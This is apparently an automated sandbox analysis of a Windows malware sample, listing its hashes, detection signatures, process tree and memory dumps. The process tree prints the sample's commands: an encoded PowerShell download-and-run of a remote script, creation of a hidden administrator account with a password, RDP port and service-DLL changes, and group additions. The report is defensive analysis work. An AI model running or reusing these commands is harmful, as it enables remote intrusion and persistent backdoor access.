Analysis

  • max time kernel
    133s
  • max time network
    165s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-08-2021 05:19

General

  • Target

    1aa9dda1b9b413444b0668500611c7f3.exe

  • Size

    7.2MB

  • MD5

    1aa9dda1b9b413444b0668500611c7f3

  • SHA1

    d980ac83bf107df1a7510ad94304a7e364d927a5

  • SHA256

    02031c62d916cdd41d26a271e93ec5b06eabfa910187207b02ead07fd480c2a9

  • SHA512

    37a301fd61c42c10f774950826469f215a20a24d783316febfeafd0fa06d88f536daa4d5d10153fd1ec42cc778d87716fe5b4bb9782c03e86a4e3b336e9efd53

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe
    "C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:584
    • C:\Windows\SysWOW64\dllhost.exe
      "C:\Windows\System32\dllhost.exe"
      2⤵
        PID:1088
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd < Bianchezza.xltx
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:504
        • C:\Windows\SysWOW64\cmd.exe
          cmd
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3168
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V /R "^neXfkAonzMgXVmZcOdbhYtXinpUsiRQPwpGkvuIPGbsmTRiWdNhKCZQztQQwGRdBWnVLTOZIHIGBMnhHwYqzEyjezjuGfHoPuPCcVveCOErUagHFCoZIRXXQkTsHHzzqmRcWVSM$" Veda.xltx
            4⤵
              PID:2080
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
              Uso.exe.com B
              4⤵
              • Executes dropped EXE
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2076
              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com B
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:3940
                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1840
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                    7⤵
                    • Drops file in Windows directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2068
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1f1xzxvc\1f1xzxvc.cmdline"
                      8⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3976
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF3D7.tmp" "c:\Users\Admin\AppData\Local\Temp\1f1xzxvc\CSCC01F7819505B4CD38E2EBF3B2323F1.TMP"
                        9⤵
                          PID:2132
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3236
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1916
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3680
                      • C:\Windows\system32\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                        8⤵
                          PID:4060
                        • C:\Windows\system32\reg.exe
                          "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                          8⤵
                          • Modifies registry key
                          PID:192
                        • C:\Windows\system32\reg.exe
                          "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                          8⤵
                            PID:212
                          • C:\Windows\system32\net.exe
                            "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                            8⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1248
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                              9⤵
                                PID:3916
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                              8⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2560
                              • C:\Windows\system32\cmd.exe
                                cmd /c net start rdpdr
                                9⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3140
                                • C:\Windows\system32\net.exe
                                  net start rdpdr
                                  10⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3948
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 start rdpdr
                                    11⤵
                                      PID:1648
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                8⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1116
                                • C:\Windows\system32\cmd.exe
                                  cmd /c net start TermService
                                  9⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3476
                                  • C:\Windows\system32\net.exe
                                    net start TermService
                                    10⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3864
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 start TermService
                                      11⤵
                                        PID:2108
                        • C:\Windows\SysWOW64\PING.EXE
                          ping GFBFPSXA -n 30
                          4⤵
                          • Runs ping.exe
                          PID:2188
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user wgautilacc Ghar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3960
                    • C:\Windows\system32\net.exe
                      net.exe user wgautilacc Ghar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2880
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                        3⤵
                          PID:2096
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user wgautilacc n6UvtOVP /add
                      1⤵
                        PID:2764
                        • C:\Windows\system32\net.exe
                          net.exe user wgautilacc n6UvtOVP /add
                          2⤵
                            PID:3684
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 user wgautilacc n6UvtOVP /add
                              3⤵
                                PID:3968
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                            1⤵
                              PID:2164
                              • C:\Windows\system32\net.exe
                                net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                2⤵
                                  PID:2716
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                    3⤵
                                      PID:1356
                                • C:\Windows\System32\cmd.exe
                                  cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                  1⤵
                                    PID:1132
                                    • C:\Windows\system32\net.exe
                                      net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                      2⤵
                                        PID:852
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                          3⤵
                                            PID:1176
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                        1⤵
                                          PID:4052
                                          • C:\Windows\system32\net.exe
                                            net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                            2⤵
                                              PID:1184
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                                3⤵
                                                  PID:3168
                                            • C:\Windows\System32\cmd.exe
                                              cmd /C net.exe user wgautilacc n6UvtOVP
                                              1⤵
                                                PID:1940
                                                • C:\Windows\system32\net.exe
                                                  net.exe user wgautilacc n6UvtOVP
                                                  2⤵
                                                    PID:3560
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 user wgautilacc n6UvtOVP
                                                      3⤵
                                                        PID:2880
                                                  • C:\Windows\System32\cmd.exe
                                                    cmd.exe /C wmic path win32_VideoController get name
                                                    1⤵
                                                      PID:1916
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        2⤵
                                                        • Modifies data under HKEY_USERS
                                                        PID:2208
                                                    • C:\Windows\System32\cmd.exe
                                                      cmd.exe /C wmic CPU get NAME
                                                      1⤵
                                                        PID:2144
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic CPU get NAME
                                                          2⤵
                                                          • Modifies data under HKEY_USERS
                                                          PID:1808
                                                      • C:\Windows\System32\cmd.exe
                                                        cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                        1⤵
                                                          PID:1356
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                            2⤵
                                                              PID:852
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                3⤵
                                                                • Blocklisted process makes network request
                                                                • Drops file in Program Files directory
                                                                • Drops file in Windows directory
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1176

                                                          Network

                                                          MITRE ATT&CK Enterprise v6

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • memory/1176-400-0x00000217D45E6000-0x00000217D45E8000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/1176-394-0x00000217D45E0000-0x00000217D45E2000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/1176-396-0x00000217D45E3000-0x00000217D45E5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/1176-451-0x00000217D45E8000-0x00000217D45E9000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/1840-131-0x0000023A00000000-0x0000023A0064A000-memory.dmp

                                                            Filesize

                                                            6.3MB

                                                          • memory/1840-129-0x0000023A00000000-0x0000023A0064A000-memory.dmp

                                                            Filesize

                                                            6.3MB

                                                          • memory/1840-132-0x0000023A40220000-0x0000023A40640000-memory.dmp

                                                            Filesize

                                                            4.1MB

                                                          • memory/1840-135-0x0000023A25DD3000-0x0000023A25DD5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/1840-134-0x0000023A25DD0000-0x0000023A25DD2000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/1840-136-0x0000023A25DD5000-0x0000023A25DD6000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/1840-137-0x0000023A25DD6000-0x0000023A25DD7000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/1916-277-0x000001EC71FC8000-0x000001EC71FCA000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/1916-255-0x000001EC71FC6000-0x000001EC71FC8000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/1916-254-0x000001EC71FC3000-0x000001EC71FC5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/1916-253-0x000001EC71FC0000-0x000001EC71FC2000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/2068-146-0x0000021A250E0000-0x0000021A250E1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/2068-163-0x0000021A24E30000-0x0000021A24E31000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/2068-143-0x0000021A24CC0000-0x0000021A24CC1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/2068-157-0x0000021A24CF6000-0x0000021A24CF8000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/2068-148-0x0000021A24CF0000-0x0000021A24CF2000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/2068-169-0x0000021A24CF8000-0x0000021A24CF9000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/2068-170-0x0000021A262D0000-0x0000021A262D1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/2068-149-0x0000021A24CF3000-0x0000021A24CF5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/2068-171-0x0000021A26660000-0x0000021A26661000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/3236-188-0x000002A45EFC0000-0x000002A45EFC2000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3236-189-0x000002A45EFC3000-0x000002A45EFC5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3236-208-0x000002A45EFC6000-0x000002A45EFC8000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3236-217-0x000002A45EFC8000-0x000002A45EFCA000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3680-284-0x000002D4F0BF6000-0x000002D4F0BF8000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3680-281-0x000002D4F0BF3000-0x000002D4F0BF5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3680-279-0x000002D4F0BF0000-0x000002D4F0BF2000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3940-128-0x000001D1714D0000-0x000001D1714D1000-memory.dmp

                                                            Filesize

                                                            4KB